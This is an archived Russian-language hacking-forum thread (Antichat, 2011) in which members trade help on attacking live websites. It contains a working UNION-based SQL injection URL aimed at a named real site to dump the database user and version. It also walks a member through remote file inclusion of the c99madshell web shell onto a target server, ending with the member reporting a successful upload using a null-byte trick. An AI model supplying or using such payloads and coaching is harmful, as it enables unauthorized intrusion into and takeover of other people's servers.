ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.01.2011, 05:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 3820
Репутация:
0
|
|
Сообщение от None
Забыл поставить кавычку
Вот так
Сообщение от None
%URL%?req=1'+union+selest+1,2
и так
Сообщение от None
%URL%?req=1'+union+selest+1,2--
Всё равно те же ошибки.
UPD:
Redwood, точно
Спасибо.
|
|
|
|

09.01.2011, 11:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Код:
Code:
$a = $_GET["req"];
SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a
Вообще-то исходя из логики, то запрос первый запрос должен вернуть ноль строк, что бы нужные данные, т.е.
Код:
Code:
SELECT id, text FROM sqltable WHERE id = 0 UNION SELECT 1, 2
и ID = 0 только в том случае если нулевого айди нет в таблицы, либо любой другой символ. Или же
Код:
Code:
SELECT id, text FROM sqltable WHERE id = 1 AND 1=0 UNION SELECT 1, 2
в данном случае запись с id = 1 существует в базе, но так как 1 не равно 0 то нам вернут нужный ответ.
|
|
|
|

09.01.2011, 13:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 220
Репутация:
0
|
|
помогите раскуртить
http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
|
|
|
|

09.01.2011, 14:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от villagay
villagay said:
помогите раскуртить
http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
собственно в чем проблема?
Код:
Code:
http://prostitutki-vip.com/anketa.php?id=69+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
|
|
|
|

09.01.2011, 14:06
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме: 866555
Репутация:
226
|
|
проблема в том что статьи про скули разучились читать(
|
|
|

09.01.2011, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от Onkelz
Onkelz said:
Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.
ххх.com/index.php?con=http://site.com/c99madshell
на страице открывает шелл , с моим сайтом. ТАк должно быть ?
потом перехожу
ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?
Если нада доп. инфа говорите.
Ну тут два варианта, либо это RFI, либо просто фрейм.
В случае РФИ код веб-шелл должен просто исполнится на стороне атакуемого сервера. Из твоего поста не понятно, какое расширение у веб-шелла на твоем сайте, и не понятно что он в итоге у тебя вывел.
Так что дай больше информации
|
|
|
|

09.01.2011, 14:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 8717
Репутация:
-1
|
|
РОсширение .php.
НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
|
|
|
|

09.01.2011, 15:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от Onkelz
Onkelz said:
РОсширение .php.
НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
|
|
|
|

09.01.2011, 15:25
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 8
Провел на форуме: 41003
Репутация:
0
|
|
Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.
|
|
|

09.01.2011, 16:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 8717
Репутация:
-1
|
|
Сообщение от Expl0ited
Expl0ited said:
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
До он исполняет на моем сайте, и потом лдает результат. ЩА тестану , и отпишусь.
UPD: Залил) помогло добавления нулл байта после .txt)
СПасибо за помощь! Лови +
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|